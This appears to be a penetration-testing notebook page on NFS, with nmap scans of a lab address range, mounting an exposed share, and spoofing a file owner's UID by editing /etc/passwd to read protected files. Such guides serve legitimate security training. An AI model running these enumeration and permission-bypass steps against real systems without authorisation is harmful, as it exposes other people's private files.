> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/initial-access/services/nfs.md).

# NFS

## Background:

**Network File System:** allows a user on a client computer to access files over a computer network as if they were on locally-mounted storage.<br>

**Portmapper and RPCbind:** run on TCP port 111. RPCbind maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number (often TCP port 2049) so it can communicate with the requested service. We can scan these ports with nmap using the following syntax below.

## Scans:

**Scan for NFS open:**\
`#`<mark style="color:green;">`nmap -v -p 111 10.11.1.1-254`</mark>\
\
**Rpcinfo to find services that may have registered with rpcbind:**\
`#`<mark style="color:green;">`nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254`</mark>\
\
**NMAP NSE for NFS:**\
`#`<mark style="color:green;">`nmap -p 111 --script nfs* 10.11.1.72`</mark>

![](/files/-Mcql_KrDAZYZuNNn7vD)

If we get a result like this where we have a directory we can mount then the synax is:\
`#`<mark style="color:green;">`mount -o noclock 10.11.1.72:/home ~/home/`</mark> //<mark style="color:yellow;">-o</mark> nolock is used to disable file locking\
`#`<mark style="color:green;">`cd home/ && ls`</mark>

![](/files/-McqlTCB0Ilt_9XvV8Ap)

We got denied the file read so we decide to try and add a user with the same UUID of 1014.\
\#sudo adduser pwn //we automatically got assigned the 1001 user so we will need to change it to 1014 to read the file.\
\
`#`<mark style="color:green;">`sudo sed -i -e 's/1001/1014/g' /etc/passwd`</mark> //<mark style="color:yellow;">-i</mark> inline replace, <mark style="color:yellow;">-e</mark> execute script\
check with:\
`#`<mark style="color:green;">`cat /etc/passwd | grep pwn`</mark>\
`#`<mark style="color:green;">`su pwn`</mark>\
`#`<mark style="color:green;">`id`</mark>

## NSE Scripts:

| [nfs-ls](https://nmap.org/nsedoc/scripts/nfs-ls.html)               | Attempts to get useful information about files from NFS exports. The output is intended to resemble the output of `ls`.         |
| ------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------- |
| [nfs-showmount](https://nmap.org/nsedoc/scripts/nfs-showmount.html) | Shows NFS exports, like the `showmount -e` command.                                                                             |
| [nfs-statfs](https://nmap.org/nsedoc/scripts/nfs-statfs.html)       | Retrieves disk space statistics and information from a remote NFS share. The output is intended to resemble the output of `df`. |
